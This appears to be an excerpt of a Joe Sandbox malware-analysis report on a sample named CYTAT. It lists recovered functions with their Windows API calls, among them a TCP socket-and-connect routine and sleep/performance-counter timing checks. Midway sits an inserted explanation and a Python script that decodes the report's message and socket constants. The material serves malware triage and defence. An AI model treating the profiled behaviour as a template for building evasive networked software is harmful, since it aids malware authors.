                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: RectWindow
                                                • String ID:
                                                • API String ID: 861336768-0
                                                • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                APIs
                                                • SendMessageW.USER32 ref: 00449598
                                                  • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                • _wcslen.LIBCMT ref: 0044960D
                                                • _wcslen.LIBCMT ref: 0044961A
                                                • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$_wcslen$_wcspbrk
                                                • String ID:
                                                • API String ID: 1856069659-0
                                                • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                APIs
                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                • TrackPopupMenuEx.USER32(009E6470,00000000,00000000,?,?,00000000), ref: 00447991
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CursorMenuPopupTrack$Proc
                                                • String ID:
                                                • API String ID: 1300944170-0
                                                • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                APIs
                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                • String ID:
                                                • API String ID: 1822080540-0
                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                APIs
                                                • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                • EndPaint.USER32(?,?), ref: 00447D13
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                • String ID:
                                                • API String ID: 659298297-0
                                                • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                APIs
                                                • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                  • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(009E1B90,000000F1,00000000,00000000), ref: 00440E6E
                                                  • Part of subcall function 00440D98: SendMessageW.USER32(009E1B90,000000F1,00000001,00000000), ref: 00440E9A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Window$EnableMessageSend$LongShow
                                                • String ID:
                                                • API String ID: 142311417-0
                                                • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                • _wcslen.LIBCMT ref: 004458FB
                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                • String ID:
                                                • API String ID: 3087257052-0
                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                APIs
                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                • String ID:
                                                • API String ID: 245547762-0
                                                • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
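The report lists each call with its raw stack arguments, so message numbers and socket constants have to be decoded by hand: the routine at 00445879 sends 0x0E (WM_GETTEXTLENGTH) and then 0x0D (WM_GETTEXT) to a visible window and upper-cases the result with CharUpperBuffW, and the routine at 004653FE opens socket(2, 1, 6), i.e. AF_INET/SOCK_STREAM/IPPROTO_TCP, before connect and closesocket. The parser below, an added example and not Joe Sandbox or CYTAT.exe code, reads API lines in the report's own "Name.MODULE(args), ref: ADDR" format, including the "Part of subcall function" and argument-less LIBCMT variants, and annotates the arguments. The sample lines are copied from the two entries above; the constant tables are a small, partial set assumed to cover this page's entries, not a complete Windows header.

```python
"""Parse the per-function API lists of a Joe Sandbox report and decode the
numeric constants that the report leaves raw (window messages, socket args).

Added example; not Joe Sandbox or CYTAT.exe code. The line format and the
sample lines are taken from the report text; the constant tables are a
partial set assumed to cover the entries on this page."""
import re
from dataclasses import dataclass
from typing import List, Optional

# One API line: "• Name.MODULE(arg,arg), ref: ADDR". CRT calls such as
# "_wcslen.LIBCMT ref: ADDR" carry no argument list, and subcall lines are
# prefixed with "Part of subcall function ADDR:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Partial lookup tables (assumption: enough for the entries on this page).
WINDOW_MESSAGES = {
    0x000D: "WM_GETTEXT", 0x000E: "WM_GETTEXTLENGTH", 0x0020: "WM_SETCURSOR",
    0x007B: "WM_CONTEXTMENU", 0x00F0: "BM_GETCHECK", 0x00F1: "BM_SETCHECK",
    0x1101: "TVM_DELETEITEM",
}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW",
                "DefDlgProcW", "DefWindowProcW"}
SOCKET_ARG_TABLES = (
    {2: "AF_INET", 23: "AF_INET6"},          # af
    {1: "SOCK_STREAM", 2: "SOCK_DGRAM"},     # type
    {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"},   # protocol
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]            # raw hex words, or "?" where the value is unknown
    ref: int                   # address of the call site
    subcall_of: Optional[int]  # callee address when listed as a subcall


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Return an ApiCall for one report line, or None for non-API lines."""
    m = API_LINE.match(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    sub = int(m.group("sub"), 16) if m.group("sub") else None
    return ApiCall(m.group("name"), m.group("module"), args,
                   int(m.group("ref"), 16), sub)


def parse_report(text: str) -> List[ApiCall]:
    """Collect every API line from a block of report text, skipping the rest."""
    calls = []
    for line in text.splitlines():
        call = parse_api_line(line)
        if call:
            calls.append(call)
    return calls


def _hex(word: str) -> Optional[int]:
    try:
        return int(word, 16)
    except ValueError:
        return None  # "?" and other placeholders


def decode_args(call: ApiCall) -> List[str]:
    """Replace known numeric arguments with their symbolic names."""
    out = list(call.args)
    if call.name in MESSAGE_APIS and len(out) > 1:
        msg = _hex(out[1])  # second argument of SendMessage/DefDlgProc is uMsg
        if msg is not None:
            out[1] = WINDOW_MESSAGES.get(msg, f"0x{msg:04X}")
    elif call.name == "socket":
        for i, table in enumerate(SOCKET_ARG_TABLES):
            if i < len(out):
                v = _hex(out[i])
                if v is not None and v in table:
                    out[i] = table[v]
    return out


def describe(call: ApiCall) -> str:
    """Render a call as a triage note, e.g. 'socket(AF_INET, ...) @ 004653FE'."""
    return f"{call.name}({', '.join(decode_args(call))}) @ {call.ref:08X}"


# Sample lines copied from the report entries for 00445879 and 004653FE.
SAMPLE = """
• IsWindowVisible.USER32(?), ref: 00445879
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
• SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
• _wcslen.LIBCMT ref: 004458FB
• CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
• socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
• connect.WSOCK32(00000000,?,00000010), ref: 00465446
Memory Dump Source
"""

if __name__ == "__main__":
    for c in parse_report(SAMPLE):
        print(describe(c))
```

Only the first three socket arguments are decoded; the report prints a fourth stack word after them that is not a parameter of socket(). Arguments shown as "?" in the report are left untouched, since the sandbox could not resolve them statically.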
                                                APIs
                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                • BeginPath.GDI32(?), ref: 0044723D
                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Object$Select$BeginCreateDeletePath
                                                • String ID:
                                                • API String ID: 2338827641-0
                                                • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                APIs
                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: CounterPerformanceQuerySleep
                                                • String ID:
                                                • API String ID: 2875609808-0
                                                • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                APIs
                                                • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                • MessageBeep.USER32(00000000), ref: 00460C46
                                                • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                • EndDialog.USER32(?,00000001), ref: 00460C83
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                • String ID:
                                                • API String ID: 3741023627-0
                                                • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: Destroy$DeleteObjectWindow$Icon
                                                • String ID:
                                                • API String ID: 4023252218-0
                                                • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                APIs
                                                • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                • DeleteObject.GDI32(?), ref: 00455736
                                                • DeleteObject.GDI32(?), ref: 00455744
                                                • DestroyIcon.USER32(?), ref: 00455752
                                                • DestroyWindow.USER32(?), ref: 00455760
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1271639323.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 00000000.00000002.1271619221.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271702882.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1271724222.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272063608.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272084813.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                 • Associated: 00000000.00000002.1272125347.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CYTAT.jbxd
                                                Similarity
                                                • API ID: DeleteDestroyObject$IconMessageSendWindow
